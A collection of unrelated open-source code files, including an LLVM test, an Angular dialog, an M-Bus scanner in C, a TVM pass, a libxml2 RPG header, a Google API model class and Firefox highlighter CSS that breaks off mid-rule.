"pile_set_name": "Github"
} |
; Test to ensure that non-prevailing weak aliasee is kept as a weak definition
; when the alias is not dead.
; RUN: opt -module-summary %s -o %t1.bc
; RUN: llvm-lto2 run %t1.bc \
; RUN: -r=%t1.bc,__a,lx \
; RUN: -r=%t1.bc,__b,l \
; RUN: -r=%t1.bc,a,plx \
; RUN: -r=%t1.bc,b,pl \
; RUN: -o %t2.o -save-temps
; Check that __a is kept as a weak def. __b can be dropped since its alias is
; not live and will also be dropped.
; RUN: llvm-dis %t2.o.1.1.promote.bc -o - | FileCheck %s
; CHECK: define weak hidden void @__a
; CHECK: declare hidden void @__b
; CHECK: declare void @b
target datalayout = "e-m:e-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"
@a = hidden alias void (), void ()* @__a
define weak hidden void @__a() {
entry:
ret void
}
@b = hidden alias void (), void ()* @__b
define weak hidden void @__b() {
entry:
ret void
}
| {
"pile_set_name": "Github"
} |
import { ChangeDetectionStrategy, ChangeDetectorRef, Component } from "@angular/core";
import { MatDialogRef } from "@angular/material/dialog";
import { autobind } from "@batch-flask/core";
import { ConfirmationDialog } from "@batch-flask/ui";
import { Job } from "app/models";
@Component({
selector: "bl-disable-job-dialog",
templateUrl: "disable-job-dialog.html",
changeDetection: ChangeDetectionStrategy.OnPush,
})
export class DisableJobDialogComponent extends ConfirmationDialog<string> {
public set jobs(jobs: Job[]) {
this._jobs = jobs;
this.changeDetector.markForCheck();
}
public actionDescription: string = "";
public set taskAction(action: string) {
this.onChange(action);
this._taskAction = action;
this.changeDetector.markForCheck();
}
public get taskAction() { return this._taskAction; }
private _taskAction: string = "requeue";
private _jobs: Job[] = [];
constructor(public dialogRef: MatDialogRef<DisableJobDialogComponent>, private changeDetector: ChangeDetectorRef) {
super();
this.taskAction = "requeue";
}
@autobind()
public ok() {
this.markAsConfirmed(this.taskAction);
}
public get title() {
const size = this._jobs.length;
if (size > 1) {
return `Are you sure you want to disable ${size} jobs`;
} else {
const job = this._jobs.first();
return `Are you sure you want to disable job ${job && job.id}`;
}
}
public onChange(action) {
switch (action) {
case "requeue":
this.actionDescription = "Terminate running tasks and requeue them. "
+ "The tasks will run again when the job is enabled.";
break;
case "terminate":
this.actionDescription = "Terminate running tasks. The tasks will not run again.";
break;
case "wait":
this.actionDescription = "Allow currently running tasks to complete.";
break;
default:
this.actionDescription = "";
break;
}
}
}
| {
"pile_set_name": "Github"
} |
//------------------------------------------------------------------------------
// Copyright (C) 2011, Robert Johansson, Raditex AB
// All rights reserved.
//
// rSCADA
// http://www.rSCADA.se
// [email protected]
//
//------------------------------------------------------------------------------
#include <string.h>
#include <stdio.h>
#include <mbus/mbus.h>
static int debug = 0;
//
// init slave to get really the beginning of the records
//
int
init_slaves(mbus_handle *handle)
{
if (debug)
printf("%s: debug: sending init frame #1\n", __PRETTY_FUNCTION__);
if (mbus_send_ping_frame(handle, MBUS_ADDRESS_NETWORK_LAYER, 1) == -1)
{
return 0;
}
//
// resend SND_NKE, maybe the first get lost
//
if (debug)
printf("%s: debug: sending init frame #2\n", __PRETTY_FUNCTION__);
if (mbus_send_ping_frame(handle, MBUS_ADDRESS_BROADCAST_NOREPLY, 1) == -1)
{
return 0;
}
return 1;
}
//------------------------------------------------------------------------------
// Scan for devices using secondary addressing.
//------------------------------------------------------------------------------
int
main(int argc, char **argv)
{
char *device, *addr_mask = NULL;
long baudrate = 9600;
mbus_handle *handle = NULL;
mbus_frame *frame = NULL, reply;
memset((void *)&reply, 0, sizeof(mbus_frame));
if (argc == 2)
{
device = argv[1];
addr_mask = strdup("FFFFFFFFFFFFFFFF");
}
else if (argc == 3 && strcmp(argv[1], "-d") == 0)
{
device = argv[2];
addr_mask = strdup("FFFFFFFFFFFFFFFF");
debug = 1;
}
else if (argc == 3)
{
device = argv[1];
addr_mask = strdup(argv[2]);
}
else if (argc == 4 && strcmp(argv[1], "-d") == 0)
{
device = argv[2];
addr_mask = strdup(argv[3]);
debug = 1;
}
else if (argc == 4 && strcmp(argv[1], "-b") == 0)
{
baudrate = atol(argv[2]);
device = argv[3];
addr_mask = strdup("FFFFFFFFFFFFFFFF");
}
else if (argc == 5 && strcmp(argv[1], "-d") == 0 && strcmp(argv[2], "-b") == 0)
{
baudrate = atol(argv[3]);
device = argv[4];
addr_mask = strdup("FFFFFFFFFFFFFFFF");
debug = 1;
}
else if (argc == 5 && strcmp(argv[1], "-b") == 0)
{
baudrate = atol(argv[2]);
device = argv[3];
addr_mask = strdup(argv[4]);
}
else if (argc == 6 && strcmp(argv[1], "-d") == 0)
{
baudrate = atol(argv[3]);
device = argv[4];
addr_mask = strdup(argv[5]);
debug = 1;
}
else
{
fprintf(stderr, "usage: %s [-d] [-b BAUDRATE] device [address-mask]\n", argv[0]);
fprintf(stderr, "\toptional flag -d for debug printout\n");
fprintf(stderr, "\toptional flag -b for selecting baudrate\n");
fprintf(stderr, "\trestrict the search by supplying an optional address mask on the form\n");
fprintf(stderr, "\t'FFFFFFFFFFFFFFFF' where F is a wildcard character\n");
return 0;
}
if (addr_mask == NULL)
{
fprintf(stderr, "Failed to allocate address mask.\n");
return 1;
}
if (mbus_is_secondary_address(addr_mask) == 0)
{
fprintf(stderr, "Misformatted secondary address mask. Must be 16 character HEX number.\n");
free(addr_mask);
return 1;
}
if ((handle = mbus_context_serial(device)) == NULL)
{
fprintf(stderr, "Could not initialize M-Bus context: %s\n", mbus_error_str());
free(addr_mask);
return 1;
}
if (debug)
{
mbus_register_send_event(handle, &mbus_dump_send_event);
mbus_register_recv_event(handle, &mbus_dump_recv_event);
}
if (mbus_connect(handle) == -1)
{
fprintf(stderr,"Failed to setup connection to M-bus gateway\n");
free(addr_mask);
return 1;
}
if (mbus_serial_set_baudrate(handle, baudrate) == -1)
{
fprintf(stderr, "Failed to set baud rate.\n");
free(addr_mask);
return 1;
}
frame = mbus_frame_new(MBUS_FRAME_TYPE_SHORT);
if (frame == NULL)
{
fprintf(stderr, "Failed to allocate mbus frame.\n");
free(addr_mask);
return 1;
}
if (init_slaves(handle) == 0)
{
free(addr_mask);
return 1;
}
mbus_scan_2nd_address_range(handle, 0, addr_mask);
mbus_disconnect(handle);
mbus_context_free(handle);
//printf("Summary: Tried %ld address masks and found %d devices.\n", probe_count, match_count);
free(addr_mask);
return 0;
}
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
/*!
* \file canonicalize_ops.cc
* \brief Canonicalize special operators to basic operators.
This can simplify latter analysis. (e.g. Expand bias_add to expand_dims and broadcast_add.)
*/
#include <tvm/relay/analysis.h>
#include <tvm/relay/attrs/nn.h>
#include <tvm/relay/expr_functor.h>
#include <tvm/relay/op.h>
#include <tvm/relay/transform.h>
#include "pattern_util.h"
namespace tvm {
namespace relay {
class BiasAddSimplifier : public ExprRewriter {
public:
BiasAddSimplifier() : bias_add_op_(Op::Get("nn.bias_add")) {}
Expr Rewrite_(const CallNode* n, const Expr& post) override {
auto new_n = post;
if (n->op == bias_add_op_) {
Call call = Downcast<Call>(new_n);
CHECK_EQ(call->args.size(), 2);
const BiasAddAttrs* param = call->attrs.as<BiasAddAttrs>();
auto ttype = n->args[0]->type_as<TensorTypeNode>();
size_t n_dim = ttype->shape.size();
int axis = param->axis;
if (axis < 0) {
axis += n_dim;
}
Expr expanded_bias = ExpandBiasToMatchAxis(call->args[1], n_dim, {axis});
Expr ret = Add(call->args[0], expanded_bias);
ret->checked_type_ = n->checked_type_;
return ret;
}
return new_n;
}
private:
// Cache the bias_add for equivalence checking.
const Op& bias_add_op_;
};
Expr CanonicalizeOps(const Expr& e) {
auto rewriter = BiasAddSimplifier();
return PostOrderRewrite(e, &rewriter);
}
namespace transform {
Pass CanonicalizeOps() {
runtime::TypedPackedFunc<Function(Function, IRModule, PassContext)> pass_func =
[=](Function f, IRModule m, PassContext pc) {
return Downcast<Function>(CanonicalizeOps(f));
};
return CreateFunctionPass(pass_func, 3, "CanonicalizeOps", {"InferType"});
}
TVM_REGISTER_GLOBAL("relay._transform.CanonicalizeOps").set_body_typed(CanonicalizeOps);
} // namespace transform
} // namespace relay
} // namespace tvm
| {
"pile_set_name": "Github"
} |
# x^2+y^2=1
c 0 0 1 1 EXT[1,0,0] EXT[0,0,0] EXT[0,0,0] EXT[1,0,0]
c 0 0 1 1 EXT[0,0,0] EXT[1,0,0] EXT[-1,0,0] EXT[0,0,0]
c 0 0 1 1 EXT[-1,0,0] EXT[0,0,0] EXT[0,0,0] EXT[-1,0,0]
c 0 0 1 1 EXT[0,0,0] EXT[-1,0,0] EXT[1,0,0] EXT[0,0,0]
# (x-1/2)^2+y^2=1/4
c 1/2 0 1/4 1 EXT[1,0,0] EXT[0,0,0] EXT[1/2,0,0] EXT[1/2,0,0]
c 1/2 0 1/4 1 EXT[1/2,0,0] EXT[1/2,0,0] EXT[0,0,0] EXT[0,0,0]
c 1/2 0 1/4 1 EXT[0,0,0] EXT[0,0,0] EXT[1/2,0,0] EXT[-1/2,0,0]
c 1/2 0 1/4 1 EXT[1/2,0,0] EXT[-1/2,0,0] EXT[1,0,0] EXT[0,0,0]
# (x+1/2)^2+y^2=1/4
c -1/2 0 1/4 1 EXT[-1,0,0] EXT[0,0,0] EXT[-1/2,0,0] EXT[-1/2,0,0]
c -1/2 0 1/4 1 EXT[-1/2,0,0] EXT[-1/2,0,0] EXT[0,0,0] EXT[0,0,0]
c -1/2 0 1/4 1 EXT[0,0,0] EXT[0,0,0] EXT[-1/2,0,0] EXT[1/2,0,0]
c -1/2 0 1/4 1 EXT[-1/2,0,0] EXT[1/2,0,0] EXT[-1,0,0] EXT[0,0,0]
# (y-1/2)^2+x^2=1/4
c 0 1/2 1/4 1 EXT[0,0,0] EXT[1,0,0] EXT[-1/2,0,0] EXT[1/2,0,0]
c 0 1/2 1/4 1 EXT[-1/2,0,0] EXT[1/2,0,0] EXT[0,0,0] EXT[0,0,0]
c 0 1/2 1/4 1 EXT[0,0,0] EXT[0,0,0] EXT[1/2,0,0] EXT[1/2,0,0]
c 0 1/2 1/4 1 EXT[1/2,0,0] EXT[1/2,0,0] EXT[0,0,0] EXT[1,0,0]
# (y+1/2)^2+x^2=1/4
c 0 -1/2 1/4 1 EXT[0,0,0] EXT[-1,0,0] EXT[1/2,0,0] EXT[-1/2,0,0]
c 0 -1/2 1/4 1 EXT[1/2,0,0] EXT[-1/2,0,0] EXT[0,0,0] EXT[0,0,0]
c 0 -1/2 1/4 1 EXT[0,0,0] EXT[0,0,0] EXT[-1/2,0,0] EXT[-1/2,0,0]
c 0 -1/2 1/4 1 EXT[-1/2,0,0] EXT[-1/2,0,0] EXT[0,0,0] EXT[-1,0,0]
# x^2+y^2=1
a 0 0 1 1
# (x-1/2)^2+y^2=1/4
a 1/2 0 1/4 1
# (x+1/2)^2+y^2=1/4
a -1/2 0 1/4 1
# (y-1/2)^2+x^2=1/4
a 0 1/2 1/4 1
# (y+1/2)^2+x^2=1/4
a 0 -1/2 1/4 1
| {
"pile_set_name": "Github"
} |
/*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
/*
* This code was generated by https://github.com/googleapis/google-api-java-client-services/
* Modify at your own risk.
*/
package com.google.api.services.content.model;
/**
* The required fields vary based on the frequency of fetching. For a monthly fetch schedule,
* day_of_month and hour are required. For a weekly fetch schedule, weekday and hour are required.
* For a daily fetch schedule, only hour is required.
*
* <p> This is the Java data model class that specifies how to parse/serialize into the JSON that is
* transmitted over HTTP when working with the Content API for Shopping. For a detailed explanation
* see:
* <a href="https://developers.google.com/api-client-library/java/google-http-java-client/json">https://developers.google.com/api-client-library/java/google-http-java-client/json</a>
* </p>
*
* @author Google, Inc.
*/
@SuppressWarnings("javadoc")
public final class DatafeedFetchSchedule extends com.google.api.client.json.GenericJson {
/**
* The day of the month the feed file should be fetched (1-31).
* The value may be {@code null}.
*/
@com.google.api.client.util.Key
private java.lang.Long dayOfMonth;
/**
* The URL where the feed file can be fetched. Google Merchant Center will support automatic
* scheduled uploads using the HTTP, HTTPS, FTP, or SFTP protocols, so the value will need to be a
* valid link using one of those four protocols.
* The value may be {@code null}.
*/
@com.google.api.client.util.Key
private java.lang.String fetchUrl;
/**
* The hour of the day the feed file should be fetched (0-23).
* The value may be {@code null}.
*/
@com.google.api.client.util.Key
private java.lang.Long hour;
/**
* The minute of the hour the feed file should be fetched (0-59). Read-only.
* The value may be {@code null}.
*/
@com.google.api.client.util.Key
private java.lang.Long minuteOfHour;
/**
* An optional password for fetch_url.
* The value may be {@code null}.
*/
@com.google.api.client.util.Key
private java.lang.String password;
/**
* Whether the scheduled fetch is paused or not.
* The value may be {@code null}.
*/
@com.google.api.client.util.Key
private java.lang.Boolean paused;
/**
* Time zone used for schedule. UTC by default. E.g., "America/Los_Angeles".
* The value may be {@code null}.
*/
@com.google.api.client.util.Key
private java.lang.String timeZone;
/**
* An optional user name for fetch_url.
* The value may be {@code null}.
*/
@com.google.api.client.util.Key
private java.lang.String username;
/**
* The day of the week the feed file should be fetched.
* The value may be {@code null}.
*/
@com.google.api.client.util.Key
private java.lang.String weekday;
/**
* The day of the month the feed file should be fetched (1-31).
* @return value or {@code null} for none
*/
public java.lang.Long getDayOfMonth() {
return dayOfMonth;
}
/**
* The day of the month the feed file should be fetched (1-31).
* @param dayOfMonth dayOfMonth or {@code null} for none
*/
public DatafeedFetchSchedule setDayOfMonth(java.lang.Long dayOfMonth) {
this.dayOfMonth = dayOfMonth;
return this;
}
/**
* The URL where the feed file can be fetched. Google Merchant Center will support automatic
* scheduled uploads using the HTTP, HTTPS, FTP, or SFTP protocols, so the value will need to be a
* valid link using one of those four protocols.
* @return value or {@code null} for none
*/
public java.lang.String getFetchUrl() {
return fetchUrl;
}
/**
* The URL where the feed file can be fetched. Google Merchant Center will support automatic
* scheduled uploads using the HTTP, HTTPS, FTP, or SFTP protocols, so the value will need to be a
* valid link using one of those four protocols.
* @param fetchUrl fetchUrl or {@code null} for none
*/
public DatafeedFetchSchedule setFetchUrl(java.lang.String fetchUrl) {
this.fetchUrl = fetchUrl;
return this;
}
/**
* The hour of the day the feed file should be fetched (0-23).
* @return value or {@code null} for none
*/
public java.lang.Long getHour() {
return hour;
}
/**
* The hour of the day the feed file should be fetched (0-23).
* @param hour hour or {@code null} for none
*/
public DatafeedFetchSchedule setHour(java.lang.Long hour) {
this.hour = hour;
return this;
}
/**
* The minute of the hour the feed file should be fetched (0-59). Read-only.
* @return value or {@code null} for none
*/
public java.lang.Long getMinuteOfHour() {
return minuteOfHour;
}
/**
* The minute of the hour the feed file should be fetched (0-59). Read-only.
* @param minuteOfHour minuteOfHour or {@code null} for none
*/
public DatafeedFetchSchedule setMinuteOfHour(java.lang.Long minuteOfHour) {
this.minuteOfHour = minuteOfHour;
return this;
}
/**
* An optional password for fetch_url.
* @return value or {@code null} for none
*/
public java.lang.String getPassword() {
return password;
}
/**
* An optional password for fetch_url.
* @param password password or {@code null} for none
*/
public DatafeedFetchSchedule setPassword(java.lang.String password) {
this.password = password;
return this;
}
/**
* Whether the scheduled fetch is paused or not.
* @return value or {@code null} for none
*/
public java.lang.Boolean getPaused() {
return paused;
}
/**
* Whether the scheduled fetch is paused or not.
* @param paused paused or {@code null} for none
*/
public DatafeedFetchSchedule setPaused(java.lang.Boolean paused) {
this.paused = paused;
return this;
}
/**
* Time zone used for schedule. UTC by default. E.g., "America/Los_Angeles".
* @return value or {@code null} for none
*/
public java.lang.String getTimeZone() {
return timeZone;
}
/**
* Time zone used for schedule. UTC by default. E.g., "America/Los_Angeles".
* @param timeZone timeZone or {@code null} for none
*/
public DatafeedFetchSchedule setTimeZone(java.lang.String timeZone) {
this.timeZone = timeZone;
return this;
}
/**
* An optional user name for fetch_url.
* @return value or {@code null} for none
*/
public java.lang.String getUsername() {
return username;
}
/**
* An optional user name for fetch_url.
* @param username username or {@code null} for none
*/
public DatafeedFetchSchedule setUsername(java.lang.String username) {
this.username = username;
return this;
}
/**
* The day of the week the feed file should be fetched.
* @return value or {@code null} for none
*/
public java.lang.String getWeekday() {
return weekday;
}
/**
* The day of the week the feed file should be fetched.
* @param weekday weekday or {@code null} for none
*/
public DatafeedFetchSchedule setWeekday(java.lang.String weekday) {
this.weekday = weekday;
return this;
}
@Override
public DatafeedFetchSchedule set(String fieldName, Object value) {
return (DatafeedFetchSchedule) super.set(fieldName, value);
}
@Override
public DatafeedFetchSchedule clone() {
return (DatafeedFetchSchedule) super.clone();
}
}
| {
"pile_set_name": "Github"
} |
* Summary: interface for an HTML 4.0 non-verifying parser
* Description: this module implements an HTML 4.0 non-verifying parser
* with API compatible with the XML parser ones. It should
* be able to parse "real world" HTML, even if severely
* broken from a specification point of view.
*
* Copy: See Copyright for the status of this software.
*
* Author: Patrick Monnerat <[email protected]>, DATASPHERE S.A.
/if not defined(HTML_PARSER_H__)
/define HTML_PARSER_H__
/include "libxmlrpg/xmlversion"
/include "libxmlrpg/parser"
/if defined(LIBXML_HTML_ENABLED)
* Most of the back-end structures from XML and HTML are shared.
d htmlParserCtxtPtr...
d s based(######typedef######)
d like(xmlParserCtxtPtr)
d htmlParserCtxt ds based(htmlParserCtxtPtr)
d likeds(xmlParserCtxt)
d htmlParserNodeInfoPtr...
d s based(######typedef######)
d like(xmlParserNodeInfoPtr)
d htmlParserNodeInfo...
d ds based(htmlParserNodeInfoPtr)
d likeds(xmlParserNodeInfo)
d htmlSAXHandlerPtr...
d s based(######typedef######)
d like(xmlSAXHandlerPtr)
d htmlSAXHandler ds based(htmlSAXHandlerPtr)
d likeds(xmlSAXHandler)
d htmlParserInputPtr...
d s based(######typedef######)
d like(xmlParserInputPtr)
d htmlParserInput...
d ds based(htmlParserInputPtr)
d likeds(xmlParserInput)
d htmlDocPtr s based(######typedef######)
d like(xmlDocPtr)
d htmlNodePtr s based(######typedef######)
d like(xmlNodePtr)
* Internal description of an HTML element, representing HTML 4.01
* and XHTML 1.0 (which share the same structure).
d htmlElemDescPtr...
d s * based(######typedef######)
d htmlElemDesc ds based(htmlElemDescPtr)
d align qualified
d name * const char *
d startTag 3u 0 Start tag implied ?
d endTag 3u 0 End tag implied ?
d saveEndTag 3u 0 Save end tag ?
d empty 3u 0 Empty element ?
d depr 3u 0 Deprecated element ?
d dtd 3u 0 Loose DTD/Frameset
d isinline 3u 0 Block 0/inline elem?
d desc * const char *
*
* New fields encapsulating HTML structure
*
* Bugs:
* This is a very limited representation. It fails to tell us when
* an element *requires* subelements (we only have whether they're
* allowed or not), and it doesn't tell us where CDATA and PCDATA
* are allowed. Some element relationships are not fully represented:
* these are flagged with the word MODIFIER
*
d subelts * const char * *
d defaultsubelt * const char *
d attrs_opt * const char * *
d attrs_depr * const char * *
d attrs_req * const char * *
* Internal description of an HTML entity.
d htmlEntityDescPtr...
d s * based(######typedef######)
d htmlEntityDesc...
d ds based(htmlEntityDescPtr)
d align qualified
d value 10u 0 Unicode char value
d name * const char *
d desc * const char *
* There is only few public functions.
d htmlTagLookup pr extproc('htmlTagLookup')
d like(htmlElemDescPtr) const
d tag * value options(*string) const xmlChar *
d htmlEntityLookup...
d pr extproc('htmlEntityLookup')
d like(htmlEntityDescPtr) const
d name * value options(*string) const xmlChar *
d htmlEntityValueLookup...
d pr extproc('htmlEntityValueLookup')
d like(htmlEntityDescPtr) const
d value 10u 0 value
d htmlIsAutoClosed...
d pr 10i 0 extproc('htmlIsAutoClosed')
d doc value like(htmlDocPtr)
d elem value like(htmlNodePtr)
d htmlAutoCloseTag...
d pr 10i 0 extproc('htmlAutoCloseTag')
d doc value like(htmlDocPtr)
d name * value options(*string) const xmlChar *
d elem value like(htmlNodePtr)
d htmlParseEntityRef...
d pr extproc('htmlParseEntityRef')
d like(htmlEntityDescPtr) const
d ctxt value like(htmlParserCtxtPtr)
d str * const xmlChar *(*)
d htmlParseCharRef...
d pr 10i 0 extproc('htmlParseCharRef')
d ctxt value like(htmlParserCtxtPtr)
d htmlParseElement...
d pr extproc('htmlParseElement')
d ctxt value like(htmlParserCtxtPtr)
d htmlNewParserCtxt...
d pr extproc('htmlNewParserCtxt')
d like(htmlParserCtxtPtr)
d htmlCreateMemoryParserCtxt...
d pr extproc('htmlCreateMemoryParserCtxt')
d like(htmlParserCtxtPtr)
d buffer * value options(*string) const char *
d size 10i 0 value
d htmlParseDocument...
d pr 10i 0 extproc('htmlParseDocument')
d ctxt value like(htmlParserCtxtPtr)
d htmlSAXParseDoc...
d pr extproc('htmlSAXParseDoc')
d like(htmlDocPtr)
d cur * value options(*string) xmlChar *
d encoding * value options(*string) const char *
d sax value like(htmlSAXHandlerPtr)
d userData * value void *
d htmlParseDoc pr extproc('htmlParseDoc')
d like(htmlDocPtr)
d cur * value options(*string) xmlChar *
d encoding * value options(*string) const char *
d htmlSAXParseFile...
d pr extproc('htmlSAXParseFile')
d like(htmlDocPtr)
d filename * value options(*string) const char *
d encoding * value options(*string) const char *
d sax value like(htmlSAXHandlerPtr)
d userData * value void *
d htmlParseFile pr extproc('htmlParseFile')
d like(htmlDocPtr)
d filename * value options(*string) const char *
d encoding * value options(*string) const char *
d UTF8ToHtml pr 10i 0 extproc('UTF8ToHtml')
d out 65535 options(*varsize) unsigned char []
d outlen 10i 0
d in * value options(*string) const unsigned char*
d inlen 10i 0
d htmlEncodeEntities...
d pr 10i 0 extproc('htmlEncodeEntities')
d out 65535 options(*varsize) unsigned char []
d outlen 10i 0
d in * value options(*string) const unsigned char*
d inlen 10i 0
d quoteChar 10i 0 value
d htmlIsScriptAttribute...
d pr 10i 0 extproc('htmlIsScriptAttribute')
d name * value options(*string) const xmlChar *
d htmlHandleOmittedElem...
d pr 10i 0 extproc('htmlHandleOmittedElem')
d val 10i 0 value
/if defined(LIBXML_PUSH_ENABLED)
* Interfaces for the Push mode.
d htmlCreatePushParserCtxt...
d pr extproc('htmlCreatePushParserCtxt')
d like(htmlParserCtxtPtr)
d sax value like(htmlSAXHandlerPtr)
d user_data * value void *
d chunk * value options(*string) const char *
d size 10i 0 value
d filename * value options(*string) const char *
d enc value like(xmlCharEncoding)
d htmlParseChunk pr 10i 0 extproc('htmlParseChunk')
d ctxt value like(htmlParserCtxtPtr)
d chunk * value options(*string) const char *
d size 10i 0 value
d terminate 10i 0 value
/endif LIBXML_PUSH_ENABLED
d htmlFreeParserCtxt...
d pr extproc('htmlFreeParserCtxt')
d ctxt value like(htmlParserCtxtPtr)
* New set of simpler/more flexible APIs
* xmlParserOption:
*
* This is the set of XML parser options that can be passed down
* to the xmlReadDoc() and similar calls.
d htmlParserOption...
d s 10i 0 based(######typedef######) enum
d HTML_PARSE_RECOVER... Relaxed parsing
d c X'00000001'
d HTML_PARSE_NODEFDTD... No default doctype
d c X'00000004'
d HTML_PARSE_NOERROR... No error reports
d c X'00000020'
d HTML_PARSE_NOWARNING... No warning reports
d c X'00000040'
d HTML_PARSE_PEDANTIC... Pedantic err reports
d c X'00000080'
d HTML_PARSE_NOBLANKS... Remove blank nodes
d c X'00000100'
d HTML_PARSE_NONET... Forbid net access
d c X'00000800'
d HTML_PARSE_NOIMPLIED... No implied html/body
d c X'00002000'
d HTML_PARSE_COMPACT... compact small txtnod
d c X'00010000'
d HTML_PARSE_IGNORE_ENC... Ignore encoding hint
d c X'00200000'
d htmlCtxtReset pr extproc('htmlCtxtReset')
d ctxt value like(htmlParserCtxtPtr)
d htmlCtxtUseOptions...
d pr 10i 0 extproc('htmlCtxtUseOptions')
d ctxt value like(htmlParserCtxtPtr)
d options 10i 0 value
d htmlReadDoc pr extproc('htmlReadDoc')
d like(htmlDocPtr)
d cur * value options(*string) const xmlChar *
d URL * value options(*string) const char *
d encoding * value options(*string) const char *
d options 10i 0 value
d htmlReadFile pr extproc('htmlReadFile')
d like(htmlDocPtr)
d URL * value options(*string) const char *
d encoding * value options(*string) const char *
d options 10i 0 value
d htmlReadMemory pr extproc('htmlReadMemory')
d like(htmlDocPtr)
d buffer * value options(*string) const char *
d size 10i 0 value
d URL * value options(*string) const char *
d encoding * value options(*string) const char *
d options 10i 0 value
d htmlReadFd pr extproc('htmlReadFd')
d like(htmlDocPtr)
d fd 10i 0 value
d URL * value options(*string) const char *
d encoding * value options(*string) const char *
d options 10i 0 value
d htmlReadIO pr extproc('htmlReadIO')
d like(htmlDocPtr)
d ioread value like(xmlInputReadCallback)
d ioclose value like(xmlInputCloseCallback)
d ioctx * value void *
d URL * value options(*string) const char *
d encoding * value options(*string) const char *
d options 10i 0 value
d htmlCtxtReadDoc...
d pr extproc('htmlCtxtReadDoc')
d like(htmlDocPtr)
d ctxt value like(xmlParserCtxtPtr)
d cur * value options(*string) const xmlChar *
d URL * value options(*string) const char *
d encoding * value options(*string) const char *
d options 10i 0 value
d htmlCtxtReadFile...
d pr extproc('htmlCtxtReadFile')
d like(htmlDocPtr)
d ctxt value like(xmlParserCtxtPtr)
d filename * value options(*string) const char *
d encoding * value options(*string) const char *
d options 10i 0 value
d htmlCtxtReadMemory...
d pr extproc('htmlCtxtReadMemory')
d like(htmlDocPtr)
d ctxt value like(xmlParserCtxtPtr)
d buffer * value options(*string) const char *
d size 10i 0 value
d URL * value options(*string) const char *
d encoding * value options(*string) const char *
d options 10i 0 value
d htmlCtxtReadFd pr extproc('htmlCtxtReadFd')
d like(htmlDocPtr)
d ctxt value like(xmlParserCtxtPtr)
d fd 10i 0 value
d URL * value options(*string) const char *
d encoding * value options(*string) const char *
d options 10i 0 value
d htmlCtxtReadIO pr extproc('htmlCtxtReadIO')
d like(htmlDocPtr)
d ctxt value like(xmlParserCtxtPtr)
d ioread value like(xmlInputReadCallback)
d ioclose value like(xmlInputCloseCallback)
d ioctx * value void *
d URL * value options(*string) const char *
d encoding * value options(*string) const char *
d options 10i 0 value
* Further knowledge of HTML structure
d htmlStatus s 10i 0 based(######typedef######) enum
d HTML_NA c X'0000' No check at all
d HTML_INVALID c X'0001'
d HTML_DEPRECATED...
d c X'0002'
d HTML_VALID c X'0004'
d HTML_REQUIRED c X'000C' HTML_VALID ored-in
* Using htmlElemDesc rather than name here, to emphasise the fact
* that otherwise there's a lookup overhead
d htmlAttrAllowed...
d pr extproc('htmlAttrAllowed')
d like(htmlStatus)
d #param1 value like(htmlElemDescPtr) const
d #param2 * value options(*string) const xmlChar *
d #param3 10i 0 value
d htmlElementAllowedHere...
d pr 10i 0 extproc('htmlElementAllowedHere')
d #param1 value like(htmlElemDescPtr) const
d #param2 * value options(*string) const xmlChar *
d htmlElementStatusHere...
d pr extproc('htmlElementStatusHere')
d like(htmlStatus)
d #param1 value like(htmlElemDescPtr) const
d #param2 value like(htmlElemDescPtr) const
d htmlNodeStatus pr extproc('htmlNodeStatus')
d like(htmlStatus)
d #param1 value like(htmlNodePtr)
d #param2 10i 0 value
* C macros implemented as procedures for ILE/RPG support.
d htmlDefaultSubelement...
d pr * extproc('__htmlDefaultSubelement') const char *
d elt * value const htmlElemDesc *
d htmlElementAllowedHereDesc...
d pr 10i 0 extproc(
d '__htmlElementAllowedHereDesc')
d parent * value const htmlElemDesc *
d elt * value const htmlElemDesc *
d htmlRequiredAttrs...
d pr * extproc('__htmlRequiredAttrs') const char * *
d elt * value const htmlElemDesc *
/endif LIBXML_HTML_ENABLED
/endif HTML_PARSER_H__
| {
"pile_set_name": "Github"
} |
{
"slug": "viviteel",
"category": "galvanised",
"ai": "RandomAI",
"moveset": [
{
"level_learned": 2,
"technique": "rust_bomb"
},
{
"level_learned": 2,
"technique": "constrict"
},
{
"level_learned": 2,
"technique": "perfect_cut"
}
],
"shape": "Serpent",
"types": [
"Metal"
],
"weight": 25
}
| {
"pile_set_name": "Github"
} |
/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
.highlighter-container {
pointer-events: none;
}
.highlighter-controls {
position: absolute;
top: 0;
left: 0;
}
.highlighter-outline-container {
overflow: hidden;
position: relative;
}
.highlighter-outline {
position: absolute;
}
.highlighter-outline[hidden] {
opacity: 0;
pointer-events: none;
display: -moz-box;
}
.highlighter-outline:not([disable-transitions]) {
transition-property: opacity, top, left, width, height;
transition-duration: 0.1s;
transition-timing-function: linear;
}
/*
* Node Infobar
*/
.highlighter-nodeinfobar-container {
position: absolute;
max-width: 95%;
}
.highlighter-nodeinfobar-container[hidden] {
opacity: 0;
pointer-events: none;
display: -moz-box;
}
.highlighter-nodeinfobar-container:not([disable-transitions]),
.highlighter-nodeinfobar-container[disable-transitions][force-transitions] {
transition-property: transform, opacity, top, left;
transition-duration: 0.1s;
transition-timing-function: linear;
}
.highlighter-nodeinfobar-text {
overflow: hidden;
white-space: nowrap;
text-overflow: ellipsis;
direction: ltr;
}
.highlighter-nodeinfobar-button > .toolbarbutton-text {
display: none;
}
.highlighter-nodeinfobar-container:not([locked]):not(:hover) > .highlighter-nodeinfobar > .highlighter-nodeinfobar-button {
